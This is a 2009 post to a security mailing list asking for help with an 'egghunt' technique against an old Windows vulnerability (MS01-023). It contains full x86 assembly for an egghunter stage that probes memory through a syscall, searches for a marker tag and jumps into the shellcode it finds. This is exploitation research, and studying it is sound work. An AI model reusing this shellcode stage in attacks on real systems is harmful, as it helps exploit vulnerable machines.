Dailydave mailing list archives

Merry Xmas & Happy "Search Memory for you Shellcode"...


From: "Nelson Brito" <nbrito () sekure org>
Date: Wed, 23 Dec 2009 12:16:08 -0200

Hey, fellows.

I got some spare time to work with a well-known technique called "egghunt",
based on skape's excellent article "Safely Searching Process Virtual Address
Space" (http://www.hick.org/code/skape/papers/egghunt-shellcode.pdf).

But while trying to perform this technique on a really old vulnerability
(MS01-023), the egghunt doesn't work as well as I was expecting.

The code:
win32_syscall_forward_01 PROC
        start:
                xor     edx, edx        ; zero edx; necessary to avoid a BO in 'Release'
        inc_page:
                or      dx, 0FFFh       ; add PAGE_SIZE-1 to edx
        inc_byte:
                inc     edx             ; increment our pointer by one
        setup_syscall:
                push    edx             ; save edx on the stack
                push    +02h            ; push NtAccessCheckAndAuditAlarm
                pop     eax             ; pop into eax
                int     2Eh             ; perform the syscall (KiSystemService())
                cmp     al, 05h         ; did we get 0xc0000005 (STATUS_ACCESS_VIOLATION)?
                pop     edx             ; restore edx
                je      inc_page        ; yes, invalid pointer, go to the next page
        setup_badge:
                mov     eax, "NBNB"     ; throw our badge in eax
        check_badge:
                mov     edi, edx        ; set edi to the pointer we validated
                scasd                   ; compare the dword in edi to eax
                jnz     inc_byte        ; no match? increment the pointer by one
                scasd                   ; compare the dword in edi to eax again - edi is now edx + 4
                jnz     inc_byte        ; no match? increment the pointer by one
        badge_found:
                jmp     edi             ; found the badge, jump 8 bytes past it into our code
win32_syscall_forward_01 ENDP

Well, I called this "forward" because it will try to find the code from "the
place" where the BO happens to the end of the STACK. Am I right?

But in this vulnerability the stager shellcode will be placed somewhere at the
BOTTOM of the STACK, right?

/*
 * $Id: .siganture,v 1.3 2009-12-11 09:22:54-02 nbrito Exp $
 *
 * Author: Nelson Brito <nbrito [at] sekure [dot] org>
 *
 * Copyright(c) 2004-2009 Nelson Brito. All rights reserved worldwide.
 * http://fnstenv.blogspot.com
 */


_______________________________________________
Dailydave mailing list
Dailydave () lists immunitysec com
http://lists.immunitysec.com/mailman/listinfo/dailydave
